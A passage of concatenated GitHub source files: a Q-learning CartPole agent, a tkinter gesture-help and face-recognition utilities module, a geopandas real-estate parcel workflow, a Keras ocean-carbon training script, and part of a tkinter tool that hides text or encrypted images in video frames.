upper_bounds = [self.env.observation_space.high[0], 0.5, self.env.observation_space.high[2], math.radians(50)]\n lower_bounds = [self.env.observation_space.low[0], -0.5, self.env.observation_space.low[2], -math.radians(50)]\n ratios = [(state[i] + abs(lower_bounds[i])) / (upper_bounds[i] - lower_bounds[i]) for i in range(len(state))]\n discretized_state = [int(round((self.buckets[i] - 1) * ratios[i])) for i in range(len(state))]\n discretized_state = [min(self.buckets[i] - 1, max(0, discretized_state[i])) for i in range(len(state))]\n return tuple(discretized_state)\n\n # Choosing action based on epsilon-greedy policy\n def choose_action(self, state, epsilon):\n return self.env.action_space.sample() if (np.random.random() <= epsilon) else np.argmax(self.Q[state])\n\n # Updating Q-value of state-action pair based on the Bellman equation\n def update_q(self, state, action, reward, next_state, alpha):\n self.Q[state][action] += alpha * (reward + self.gamma * np.max(self.Q[next_state]) - self.Q[state][action])\n\n # Reduce Exploration Rate Over time\n def get_epsilon(self, t):\n return max(self.min_epsilon, min(1, 1.0 - math.log10((t + 1) / self.ada_divisor)))\n\n # Reduce Learning Rate over time\n def get_alpha(self, t):\n return max(self.min_alpha, min(1.0, 1.0 - math.log10((t + 1) / self.ada_divisor)))\n\nnum_runs = 1\nrun_rewards = []\nenv = gym.make('CartPole-v0')\n\nfor n in range(num_runs):\n print(\"Run {}\".format(n))\n ep_rewards = []\n num_episodes = 200\n agent = QAgent(env)\n\n for ep in range(num_episodes):\n # As states are continuous, discretize them into buckets\n discretized_state = agent.discretize(env.reset())\n\n # Get adaptive learning alpha and epsilon decayed over time\n alpha = agent.get_alpha(ep)\n epsilon = agent.get_epsilon(ep)\n \n total_reward = 0\n done = False\n #i = 0\n \n while not done:\n # Choose action according to greedy policy and take it\n action = agent.choose_action(discretized_state, epsilon)\n state, reward, done, info = env.step(action)\n next_state = agent.discretize(state)\n # Update Q-Table\n agent.update_q(discretized_state, action, reward, next_state, alpha)\n discretized_state = next_state\n #i += 1\n # env.render()\n total_reward += reward\n # time.sleep(0.03)\n ep_rewards.append(total_reward)\n print(\"Episode: {}, total_reward: {:.2f}\".format(ep, total_reward))\nrun_rewards.append(ep_rewards)\nenv.close()\n\nfor n, ep_rewards in enumerate(run_rewards):\n x = range(len(ep_rewards))\n cumsum = np.cumsum(ep_rewards)\n avgs = [cumsum[ep]/(ep+1) if ep<100 else (cumsum[ep]-cumsum[ep-100])/100 for ep in x]\n plt.plot(x, avgs)\nplt.title(\"Agent Performance\")\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Average Reward\")","repo_name":"JonasRosenzweig/RLProject","sub_path":"PythonCode/QCartpole.py","file_name":"QCartpole.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36825436546","text":"from RecognitionClass import FaceRecognition\nimport time\nfrom playsound import playsound\nfrom micro import microphone\nimport threading\nimport time\nfrom tkinter import *\nimport os\nfrom PIL import Image, ImageTk\nimport pygame\n\n\nclass thread_with_exception(threading.Thread):\n def __init__(self, name):\n threading.Thread.__init__(self)\n self._stop_event = threading.Event()\n self.name = name\n self.destroyed = None\n self.win = None\n self.screen_width = None\n self.screen_height = None\n self.i = 0\n\n def run(self):\n\n # target function of the thread class\n try:\n print(\"STARTING\", self.name)\n self.getGesturesHelp()\n finally:\n print('ended')\n while True:\n time.sleep(1)\n\n def get_id(self):\n\n # returns id of the respective thread\n if hasattr(self, '_thread_id'):\n return self._thread_id\n for id, thread in threading._active.items():\n if thread is self:\n return id\n def my_join(self):\n print(\"about to join\")\n self.join()\n print(\"joined\")\n\n def stop(self):\n self._stop_event.set()\n\n def raise_exception(self):\n print(\"GETTING EXEption\")\n thread_id = self.get_id()\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id,\n ctypes.py_object(SystemExit))\n if res > 1:\n ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, 0)\n print('Exception raise failure')\n print(\"done\")\n\n def button_hover(self, e):\n self.win.geometry(\"100x750+{}+{}\".format(self.screen_width - 100, 120))\n self.button.config(bg='#333333')\n self.button.config(fg='#ffffff')\n\n def button_leave(self, e):\n self.win.geometry(\"100x30+{}+{}\".format(self.screen_width - 100, 120))\n self.button.config(fg='#333333')\n self.button.config(bg='#ffffff')\n\n def getGesturesHelp(self):\n print(\"in gesture\")\n # Create an instance of tkinter frame\n self.win = None\n self.win = Tk()\n print(\"after tk\")\n self.win.overrideredirect(1)\n self.win.attributes('-topmost', 'true')\n print(\"after tk2\")\n self.screen_width = self.win.winfo_screenwidth()\n self.screen_height = self.win.winfo_screenheight()\n\n # Set the Geometry\n self.win.geometry(\"100x30+{}+{}\".format(self.screen_width - 100, 120))\n\n print(\"after tk3\")\n # Create a Button for toggle function\n self.button = Button(self.win, text=\"GESTURES\", height=1)\n self.button.config(font=('Verdana', 7))\n self.button.config(fg='#333333')\n self.button.config(bg='#ffffff')\n self.button.config(activebackground='#7a7979')\n\n self.button.config(compound='bottom')\n self.button.pack(fill=X)\n\n self.button.bind(\"\", self.button_hover)\n self.button.bind(\"\", self.button_leave)\n\n path = 'GesturesImages'\n print(\"after tk4\")\n images_list = os.listdir(path)\n\n image_size = (100, 120)\n print(\"after tk5\")\n\n image = Image.open(path + '/' + images_list[0])\n print(\"after tk5a\")\n image = image.resize(image_size)\n print(\"after tk5b\")\n print(image)\n\n try:\n #img1 = ImageTk.PhotoImage(image=PIL.Image.fromarray(image))\n print(\"self.i\", self.i)\n if self.i == 0:\n\n img1 = ImageTk.PhotoImage(image)\n self.img1 = img1\n print(\"correct\")\n except:\n img1 = self.img1\n print(\"After\")\n\n\n print(\"after tk5c\")\n label = Label(self.win, image=img1)\n label.pack()\n print(\"after tk6\")\n image = Image.open(path + '/' + images_list[1])\n image = image.resize(image_size)\n img2 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img2)\n label.pack()\n print(\"after tk7\")\n image = Image.open(path + '/' + images_list[2])\n image = image.resize(image_size)\n img3 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img3)\n label.pack()\n\n image = Image.open(path + '/' + images_list[3])\n image = image.resize(image_size)\n img4 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img4)\n label.pack()\n\n image = Image.open(path + '/' + images_list[4])\n image = image.resize(image_size)\n img5 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img5)\n label.pack()\n\n image = Image.open(path + '/' + images_list[5])\n image = image.resize(image_size)\n img6 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img6)\n label.pack()\n self.i += 1\n print(\"before after\")\n self.win.after(1000, self.check)\n print(\"BEFORE mainloop\")\n\n self.win.mainloop()\n\n def check(self):\n\n if self.destroyed == True:\n self.destroyed = False\n self.win.destroy()\n time.sleep(1)\n else:\n\n self.win.after(1000, self.check)\n\ndef play(sound_, vol):\n sound = pygame.mixer.Sound(sound_)\n sound.set_volume(vol)\n sound.play()\n\ndef start_sound(sound, vol=1):\n\n x = threading.Thread(target=play, args=(sound,vol))\n x.start()\n\n\n\ndef start_micro(lista):\n m = microphone()\n lista.append(m)\n return lista\n\ndef background_startup(detector, cap):\n counter = 0\n while counter < 50:\n print(detector.counter)\n success, img = cap.read()\n img = detector.findHands(img)\n lmList, current_hand, counter = detector.findPosition(img)\n\ndef start_recognition():\n app = FaceRecognition()\n while True:\n # 1. Get all the available classes\n #classes, images = app.getClassesImages()\n\n # 2. Apply the recognition\n user = app.recognition()\n\n # 3. Check if the user is registered\n if user is None:\n app.showErrorNoFaceDetected()\n time.sleep(5)\n elif user[\"username\"] == \"Unknown\":\n response = app.askRegistration()\n if response == 1:\n user = app.addNewUser()\n break\n elif response == 2:\n return {'id': None, 'username': 'GuestUser', 'dominant': 'Right', 'tabs': []}\n else:\n app.showInfoNewAttempt()\n time.sleep(3)\n else:\n print(\"welcome back \", str(user[\"username\"]), \"!!!\")\n break\n return user\n\ndef getGesturesHelp():\n # Create an instance of tkinter frame\n win = Tk()\n win.overrideredirect(1)\n win.attributes('-topmost', 'true')\n\n screen_width = win.winfo_screenwidth()\n screen_height = win.winfo_screenheight()\n\n # Set the Geometry\n win.geometry(\"100x30+{}+{}\".format(screen_width - 100, 120))\n\n def toggle():\n if win.winfo_height() == 30:\n win.geometry(\"100x780+{}+{}\".format(screen_width - 100, 120))\n button.config(bg='#333333')\n button.config(fg='#ffffff')\n else:\n win.geometry(\"100x30+{}+{}\".format(screen_width - 100, 120))\n button.config(fg='#333333')\n button.config(bg='#ffffff')\n\n # Create a Button for toggle function\n button = Button(win, text=\"GESTURES\", height=1, command=toggle)\n button.config(font=('Verdana', 7))\n button.config(fg='#333333')\n button.config(bg='#ffffff')\n button.config(activebackground='#7a7979')\n\n button.config(compound='bottom')\n button.pack(fill=X)\n\n path = 'GesturesImages'\n images_list = os.listdir(path)\n\n image_size = (100, 120)\n\n image = Image.open(path + '/' + images_list[0])\n image = image.resize(image_size)\n img1 = ImageTk.PhotoImage(image)\n label = Label(win, image=img1)\n label.pack()\n\n image = Image.open(path + '/' + images_list[1])\n image = image.resize(image_size)\n img2 = ImageTk.PhotoImage(image)\n label = Label(win, image=img2)\n label.pack()\n\n image = Image.open(path + '/' + images_list[2])\n image = image.resize(image_size)\n img3 = ImageTk.PhotoImage(image)\n label = Label(win, image=img3)\n label.pack()\n\n image = Image.open(path + '/' + images_list[3])\n image = image.resize(image_size)\n img4 = ImageTk.PhotoImage(image)\n label = Label(win, image=img4)\n label.pack()\n\n image = Image.open(path + '/' + images_list[4])\n image = image.resize(image_size)\n img5 = ImageTk.PhotoImage(image)\n label = Label(win, image=img5)\n label.pack()\n\n image = Image.open(path + '/' + images_list[5])\n image = image.resize(image_size)\n img6 = ImageTk.PhotoImage(image)\n label = Label(win, image=img6)\n label.pack()\n\n win.mainloop()\n","repo_name":"colloroneluca/HCI","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74686471468","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 16 16:23:30 2020\n\n@author: ep9k\n\"\"\"\n\n\"\"\" This is the master workflow script I'm using for the 2019 Boone Real Estate mailing list\n\nFollowing steps as outlines in Trello document: https://trello.com/b/Up0JxHMB/boone-real-estate\"\"\"\n\n\nimport geopandas as gpd\nimport pandas as pd\n\n#import condo_buildings_list function\nMODULE_PATH = '/Users/ep9k/Desktop/BRE/BRE 2019/BRE_Condos_List/scripts/CountyFunctions.py'\nMODULE_NAME = 'condo_buildings_list'\nimport importlib\nimport sys\nspec = importlib.util.spec_from_file_location(MODULE_NAME, MODULE_PATH)\nmodule = importlib.util.module_from_spec(spec)\nsys.modules[spec.name] = module \nspec.loader.exec_module(module)\n\nimport BRE_Workflow_Functions as bwf\n\n\n#1. Starting from scratch from original documents. This includes...\n# -Matt's original mailing list (MattOriginalMailingList.xlsx)\n# -Matt's original condo list (MattCondoAddressList2019.xlsx)\n# -All parcels (/Users/ep9k/Desktop/BRE/BRE 2019/All_Parcels_2019.gpkg)\n\n#matt's original mailing list aka 'new list'\noriginal_mailing_list = pd.read_excel('/Users/ep9k/Desktop/BRE/BRE 2019/MattOriginalMailingList.xlsx') #11,827 addresses\nall_2019_parcels = gpd.read_file('/Users/ep9k/Desktop/BRE/BRE 2019/All_Parcels_2019.gpkg') #228,393 parcels\n#all_2018_parcels = pd.read_csv('/Users/ep9k/Desktop/BRE/2018Keepers.csv') #17417 parcels\ncondos_list_2019 = pd.read_excel(r'/Users/ep9k/Desktop/BRE/BRE 2019/MattCondoAddressList2019.xlsx') #3139 parcels\n\n\n\n#2. Drop useless columns from all_2019_parcels to make data cleaner. Create Address columns to merge with original_mailing_list \ncolumns_to_drop = ['id_0', 'id', 'gnisid', 'maddpref', 'maddrno',\n 'maddstname', 'maddstr', 'maddstsuf', 'maddsttyp', 'mapref', \n 'munit', 'ownfrst', 'ownlast', 'owntype', 'parusedsc2', 'revdatetx',\n 'saddpref', 'scity', 'structno', 'subdivisio', 'subowntype', 'subsurfown', 'sunit',\n 'szip', 'layer', 'path']\n\nall_2019_parcels.drop(columns_to_drop, inplace=True, axis=1)\n\n\n\n#3. MattOriginalMailing list is not actually his original, but it is a list we have edited (most recent 4/18/2020) with 2+ removed and Subdivision columns in tact. \n##This had already been joined to the county parcels so I will merge based on the nparno\nall_2019_parcels = all_2019_parcels.merge(original_mailing_list, how='left', left_on='parno', right_on='parno')\n\n#drop useless columns from all_2019_parcels. All I want to keep after the merge is the 2+ removed, subdivision, and excluded subdivision columns\n\ncolumns_to_drop = ['altparno_y','sourceagnt_y','Unnamed: 9','id_2','fid','id','cntyfips_y','gisacres_y','ownname2_y','gnisid', 'maddpref','maddrno','maddstname','maddstr',\n 'maddstsuf','mapref','multistruc_y','munit','maddsttyp','ownfrst','ownlast','owntype','parusedsc2','parvaltype_y','presentval_y','recareano_y','recareatx_y',\n 'revdatetx','revisedate_y','reviseyear_y','saddno_y','saddpref','saddstname_y','saddstr_y','saddstsuf_y','saddsttyp_y','saledate_y','saledatetx_y',\n 'scity','sourcedate_y','sourcedatx_y','sourceref_y','sstate_y','stcntyfips_y','stfips_y','stname_y','structno','subdivisio','subowntype','subsurfown',\n 'sunit','szip','transfdate_y','id_0','id_1','layer','path', 'cntyname_y','improvval_y','landval_y','legdecfull_y','nparno_y','parusecd2_y','parusecode_y',\n 'parusedesc_y','struct_y','structyear_y']\n\n\n\nall_2019_parcels.drop(columns_to_drop, inplace=True, axis=1)\n\n##the columns in all_2019_parcels get renamed (ex:altparno_x) so I rename them to keep things clean\nall_2019_parcels.rename(columns = {'altparno_x': 'altparno','cntyfips_x': 'cntyfips','cntyname_x': 'cntyname','gisacres_x': 'gisacres',\n 'improvval_x': 'improvval','landval_x': 'landval','legdecfull_x': 'ledgecfull','multistruc_x': 'multistruc',\n 'ownname2_x': 'ownname2','parno_x': 'parno','parusecd2_x': 'parusecd2','parusecode_x': 'parusecode','parusedesc_x': 'parusedesc',\n 'parval': 'parval','parvaltype_x': 'parvaltype','presentval_x': 'presentval','recareano_x': 'recareano',\n 'recareatx_x': 'recareatx','revisedate_x': 'revisedate','reviseyear_x': 'reviseyear','saddno_x': 'saddno',\n 'saddstname_x': 'saddstname','saddstr_x': 'saddstr','saddstsuf_x': 'saddstsuf','saddsttyp_x': 'saddsttyp',\n 'saledate_x': 'saledate','saledatetx_x': 'saledatetx','sourceagnt_x': 'sourceagnt','sourcedate_x': 'sourcedate',\n 'sourcedatx_x': 'sourcedatx','sourceref_x': 'sourceref','sstate_x': 'sstate','stcntyfips_x': 'stcntyfips','stfips_x': 'stfips',\n 'stname_x': 'stname','struct_x': 'struct','structyear_x': 'structyear','transfdate_x': 'transfdate'},\n inplace=True)\n\n\n\n#4. Create Vacant Land Property Type\n\n#create 'Property Type' column and populate with true/false alues\nall_2019_parcels['Property Type'] = all_2019_parcels['landval'] == all_2019_parcels['parval']\n\n#change true/false values to 'Vacant Land' or no value. There are 95593 vacant land parcels.\nall_2019_parcels.loc[(all_2019_parcels['Property Type'] == True), 'Property Type'] = 'Vacant Land'\nall_2019_parcels.loc[(all_2019_parcels['Property Type'] == False), 'Property Type'] = ''\n\n\n##Label others from Watauga County using parusedesc. Now there are 95783 vacant land parcels (added about 200 parcels)\nall_2019_parcels = bwf.property_type_column(all_2019_parcels)\n\n#make vacant land dataframe\nvacant_land_df = all_2019_parcels[all_2019_parcels['Property Type'] == 'Vacant Land']\n#drop non-vacant land parcels from all_2019_parcels\nall_2019_parcels = all_2019_parcels[all_2019_parcels['Property Type'] != 'Vacant Land']\n\n#apply filters to vacant land df\nvacant_land_df = bwf.vacant_land_filters(vacant_land_df)\n#we are left with 4811 vacant land parcels\n\n\n\n#5. Label condo buildings as 'Property Type' = 'Condo Building'\n#first, read in condos list\n#uses condo_buildings_list function from BRE_condos_list folder (import statements at top)\ncondo_building_ids = module.condo_buildings_list(condos_list_2019)\n\n#iterate over list (condo_building_ids) and add 'Property Type' of 'Condo Building'\nall_2019_parcels.loc[all_2019_parcels['parno'].isin(condo_building_ids), 'Property Type'] = 'Condo Building'\n\n#remove condo buildings from list\nall_2019_parcels = all_2019_parcels.loc[all_2019_parcels['Property Type'] != 'Condo Building']\n\n\n#export to shapefile\nall_2019_parcels = gpd.GeoDataFrame(all_2019_parcels, geometry='geometry')\nall_2019_parcels.to_file('/Users/ep9k/Desktop/all_2019_parcels.shp')\n#move this to PostgreSQL database as new 'all_2019_parcels'\n\nvacant_land_df = gpd.GeoDataFrame(vacant_land_df, geometry='geometry')\nvacant_land_df.to_file('/Users/ep9k/Desktop/vacant_land.shp')\n##FINAL RESULT FROM THIS IS allkeepers_2019 and vacant_land_df\n#\n#\n#\n#\n##6. GO TO QGIS/POSTGRESQL with the all_2019_parcels and do the zones + price filtering\n##output of this is all_keepers2019\n##Also with vacant_land_df, clip parcels to extent of AllZonesExtent\n##output of this is vacant_land_keepers\n#\n#\n#\n\n","repo_name":"epurpur/BooneRealEstate","sub_path":"BRE_2019_Master_Workflow_pt1.py","file_name":"BRE_2019_Master_Workflow_pt1.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18507989152","text":"import numpy as np\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom keras.callbacks import CSVLogger, EarlyStopping, ModelCheckpoint\r\nimport argparse\r\nimport sys\r\nimport glob\r\nfrom datetime import datetime\r\n\r\nfrom model.core import RUnet_model\r\nfrom utils.functions import r_score, mse_nonzero, data_split\r\nfrom utils.data_generator import data_generator\r\n\r\n\r\n\r\ndef parse_args():\r\n \"\"\"\r\n Parse input arguments\r\n \"\"\"\r\n parser = argparse.ArgumentParser(description='Train a SOC model')\r\n\r\n parser.add_argument('--x', dest='x_files',\r\n help='Filenames of x data',\r\n default=None, type=str, nargs='+')\r\n\r\n parser.add_argument('--y', dest='y_files',\r\n help='Filenames of y data',\r\n default=None, type=str, nargs='+')\r\n\r\n parser.add_argument('--lvl1', dest='level1',\r\n help='First (upper) layer',\r\n default=None, type=int, nargs=1)\r\n\r\n parser.add_argument('--lvl2', dest='level2',\r\n help='Second (lower) layer',\r\n default=None, type=int, nargs=1)\r\n\r\n\r\n # datetime object containing current date and time\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%d-%m-%Y_%H:%M:%S\")\r\n\r\n parser.add_argument('--o', dest='outname',\r\n help='Trained model name',\r\n default='DLSOC_model_trained_' + dt_string + '.h5', type=str, nargs='?')\r\n\r\n parser.add_argument('--lr', dest='lr',\r\n help='Learning rate',\r\n default=1e-5, type=float, nargs='?')\r\n\r\n parser.add_argument('--w', dest='weights',\r\n help='Pretrained model weights',\r\n default=None, type=str, nargs='?')\r\n\r\n parser.add_argument('--b', dest='batch_size',\r\n help='Size for batch training',\r\n default=5, type=int, nargs='?')\r\n\r\n\r\n if len(sys.argv) < 5:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n args = parser.parse_args()\r\n\r\n if (not args.x_files) or (not args.y_files):\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n if (not args.level1) or (not args.level2):\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n args = parse_args()\r\n\r\n print('Called with args: ')\r\n print('X filenames: ', args.x_files)\r\n print('Y filenames: ', args.y_files)\r\n print('First level: ', args.level1)\r\n print('Second level: ', args.level2)\r\n print('Batch size: ', args.batch_size)\r\n print('Learning rate: ', args.lr)\r\n print('Output model name: ', args.outname)\r\n\r\n _xfiles = np.array(sorted(args.x_files))\r\n _yfiles = np.array(sorted(args.y_files))\r\n _level1 = args.level1[0]\r\n _level2 = args.level2[0]\r\n _batchsize = args.batch_size\r\n _lr = args.lr\r\n\r\n soc_model = RUnet_model(_level1, _level2)\r\n opt = Adam(lr=_lr) \r\n soc_model.compile(optimizer=opt, loss=mse_nonzero, metrics=[r_score, mse_nonzero])\r\n soc_model.info()\r\n\r\n # load pretrained model weights if provided\r\n if args.weights:\r\n soc_model.load_weights(args.weights)\r\n\r\n xtrain, ytrain, xvalid, yvalid, xtest, ytest = data_split(_xfiles, _yfiles, 0.7225, 0.85, maskname='sample_train_valid_test_mask.npz')\r\n train_generator = data_generator(xtrain, ytrain, _level1, _level2, batch_size=_batchsize)\r\n valid_generator = data_generator(xvalid, yvalid, _level1, _level2, batch_size=_batchsize)\r\n\r\n\r\n csv_logger = CSVLogger( 'sample_log.csv' , append=True, separator=';')\r\n earlystopper = EarlyStopping(patience=20, verbose=1)\r\n checkpointer = ModelCheckpoint('checkpt_{val_loss:.2e}_example.h5', verbose=1, save_best_only=True)\r\n soc_model.train(train_generator,\r\n validation_data=valid_generator, epochs=250,\r\n callbacks=[earlystopper, checkpointer, csv_logger])\r\n\r\n soc_model.save_model(args.outname)","repo_name":"tailonghe/Southern_Ocean_Carbon","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74070506988","text":"# note that module name has changed from Tkinter in Python 2 to tkinter in Python 3\n# install stegano, python-opencv, python3-tk, ffmpeg\nimport tkinter\nimport os\nimport shutil\nimport math\nimport base64\nimport cv2\nimport ed\n\nfrom stegano import lsb\nfrom tkinter.ttk import Progressbar\nfrom subprocess import call, STDOUT\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter.filedialog import askopenfile\nfrom PIL import Image\n\nvideo_path = ''\nimg_path = ''\n\nprint(\"video steganography\")\nroot = tkinter.Tk()\nroot.title(\"Video_Steganography\")\nroot.configure(bg=\"dark slate gray\")\n\n\ndef split_string(s_str, count=10):\n per_c = math.ceil(len(s_str) / count)\n c_cout = 0\n out_str = ''\n split_list = []\n for s in s_str:\n out_str += s\n c_cout += 1\n if c_cout == per_c:\n split_list.append(out_str)\n out_str = ''\n c_cout = 0\n if c_cout != 0:\n split_list.append(out_str)\n return split_list\n\n\ndef frame_extraction(video):\n if not os.path.exists(\"./tmp\"):\n os.makedirs(\"tmp\")\n temp_folder = \"./tmp\"\n print(\"[INFO] tmp directory is created\")\n video_cap = cv2.VideoCapture(video)\n count = 0\n while True:\n success, image = video_cap.read()\n if not success:\n print(\"[ERR] Some error occurred\", success)\n break\n cv2.imwrite(os.path.join(temp_folder, \"{:d}.png\".format(count)), image)\n count += 1\n\n\n# for type= text:10 img:500\ndef encode_string(input_string, types=10, temp=\"./tmp/\"):\n split_string_list = split_string(input_string, types)\n for i in range(0, len(split_string_list)):\n f_name = \"{}{}.png\".format(temp, i)\n secret_enc = lsb.hide(f_name, split_string_list[i])\n secret_enc.save(f_name)\n print(\"[INFO] frame {} holds {}\".format(f_name, split_string_list[i]))\n\n\ndef decode_string(video):\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=0, columnspan=3, padx=10, pady=10)\n frame_extraction(video)\n secret = []\n tmp = \"./tmp/\"\n progress['value'] = 20\n root.update_idletasks()\n for i in range(len(os.listdir(tmp))):\n f_name = \"{}{}.png\".format(tmp, i)\n # print(\"[INFO] Decoding frame {}\", f_name)\n secret_dec = lsb.reveal(f_name)\n # print(\"[INFO] Got {} from frame {}\", secret_dec, f_name)\n if secret_dec is None:\n break\n secret.append(secret_dec)\n\n print(''.join([i for i in secret]))\n e2.delete(0, \"end\")\n e2.insert(0, ''.join([i for i in secret]))\n progress['value'] = 100\n root.update_idletasks()\n clean_tmp()\n progress.destroy()\n\n\ndef clean_tmp(path=\"./tmp\"):\n if os.path.exists(path):\n shutil.rmtree(path)\n print(\"[INFO] tmp files are cleaned up\")\n\n\n# select a carrier video file\ndef open_file():\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n file = askopenfile(initialdir=desktop, mode='r', filetypes=[('Video Files', '*.mp4'), ('Video Files', '*.mov')])\n if file is None:\n print(\"No file selected\")\n messagebox.showwarning(\"warning\", \"Select a video file\")\n else:\n print(\"file name:\", file.name)\n e1.delete(0, \"end\")\n e1.insert(0, file.name)\n print(os.path.basename(file.name))\n global video_path\n video_path = os.path.basename(file.name)\n print('[info]', video_path)\n shutil.copy(file.name, os.getcwd())\n\n\n# select an stego_image file from desktop\ndef open_file_for_image():\n print(\"openfile\")\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n file = askopenfile(initialdir=desktop, mode='r',\n filetypes=[('Img', '*.png'), ('Img', '*.jpg'), ('Img', '*.bmp'), ('Img', '*.jpeg')])\n if file is None:\n print(\"No file selected\")\n messagebox.showwarning(\"warning\", \"Select an image file\")\n else:\n print(\"file name:\", file.name)\n e3.delete(0, \"end\")\n e3.insert(0, file.name)\n print(os.path.basename(file.name))\n global img_path\n img_path = os.path.basename(file.name)\n print('[info]', img_path)\n shutil.copy(file.name, os.getcwd())\n\n\ndef tmp_show_image():\n Image.open(\"text.png\").show()\n\n\n# encoding image into video where image in img_path and video in video_path\ndef encode_image_into_video():\n if e4.get() != '':\n key = e4.get()\n else:\n key = 'python'\n print(\"[info] key\", key)\n ed.pixelchange(img_path)\n ed.encryption_with_aes(img_path, ed.SALT, img_path, key)\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=1, columnspan=4)\n print(\"|Encrypt| img in video start\")\n print(\"image: \", img_path)\n print(\"video:\", video_path)\n progress['value'] = 10\n root.update_idletasks()\n with open(img_path, \"rb\") as image:\n bstr = base64.b64encode(image.read())\n print(bstr)\n f_name = video_path\n input_string = str(bstr)\n progress['value'] = 20\n root.update_idletasks()\n frame_extraction(f_name)\n progress['value'] = 40\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", f_name, \"-q:a\", \"0\", \"-map\", \"a\", \"tmp/audio.mp3\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT)\n encode_string(input_string, 500)\n call([\"ffmpeg\", \"-i\", \"tmp/%d.png\", \"-vcodec\", \"png\", \"tmp/video.mov\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT)\n progress['value'] = 60\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", \"tmp/video.mov\", \"-i\", \"tmp/audio.mp3\", \"-codec\", \"copy\", \"video.mp4\", \"-y\"],\n stdout=open(os.devnull, \"w\"), stderr=STDOUT)\n progress['value'] = 80\n root.update_idletasks()\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n progress['value'] = 90\n root.update_idletasks()\n shutil.copy(\"video.mp4\", desktop)\n print(\"|Info| encryption image in video is Done....\")\n progress['value'] = 100\n root.update_idletasks()\n clean_tmp()\n progress.destroy()\n\n\n# decoding image from video where video is in video_path\ndef decode_image_form_video():\n # video.mp4\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=1, columnspan=4)\n print(\"video_decoding start\")\n progress['value'] = 20\n root.update_idletasks()\n frame_extraction(video_path)\n secret = []\n tmp = \"./tmp/\"\n progress['value'] = 40\n root.update_idletasks()\n for i in range(len(os.listdir(tmp))):\n f_name = \"{}{}.png\".format(tmp, i)\n # print(\"[INFO] Decoding frame {}\", f_name)\n secret_dec = lsb.reveal(f_name)\n # print(\"[INFO] Got {} from frame {}\", secret_dec, f_name)\n if secret_dec is None:\n break\n secret.append(secret_dec)\n video_data = ''.join([i for i in secret]) #making paragraph of list item\n progress['value'] = 80\n root.update_idletasks()\n clean_tmp()\n print(\"video_decoding start done\")\n string_to_rgb(video_data)\n progress.destroy()\n\n\ndef string_to_rgb(bstr):\n print(\"stringToRGB\")\n b_bstr = bstr[2:]\n #b_bstr = bstr\n x = base64.b64decode(b_bstr)\n fin = open(\"sample.enc\", \"wb\") #recive file\n fin.write(x)\n fin.close()\n #converting decryption resuffle\n if e4.get() != '':\n key = e4.get()\n else:\n key = 'python'\n print(\"[info] key\", key)\n ed.decryption_with_aes(\"sample.enc\",ed.SALT,\"sample.png\",key)\n ed.pixelchange(\"sample.png\")\n print(\"image file save as sample.png\")\n global img_path\n img_path = \"sample.png\"\n Image.open(\"sample.png\").show()\n print(\"stringToRGB done\")\n copy_to_desktop(\"sample.png\")\n\n\n# play button\ndef play_btn():\n if video_path == '':\n print(\"file not found\")\n else:\n print(\"file is:\", video_path)\n play_video(video_path)\n\n\ndef copy_to_desktop(file_name):\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n shutil.copy(file_name, desktop)\n\n\n# play a video using vlc\ndef play_video(video_name):\n try:\n print(\"|cmd| 'vlc' \", video_name)\n x = os.system('vlc \"%s\"' % video_name)\n if x != 0:\n messagebox.showerror(\"Req:\", \"install vlc player\")\n except:\n print(\"error:No media player found\")\n\n\ndef encrypt_message():\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=1, columnspan=4)\n print(\"|Encrypt| method invoke\")\n f_name = video_path\n\n input_string = e2.get()\n progress['value'] = 20\n root.update_idletasks()\n frame_extraction(f_name)\n progress['value'] = 30\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", f_name, \"-q:a\", \"0\", \"-map\", \"a\", \"tmp/audio.mp3\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT),\n progress['value'] = 40\n root.update_idletasks()\n encode_string(input_string)\n progress['value'] = 50\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", \"tmp/%d.png\", \"-vcodec\", \"png\", 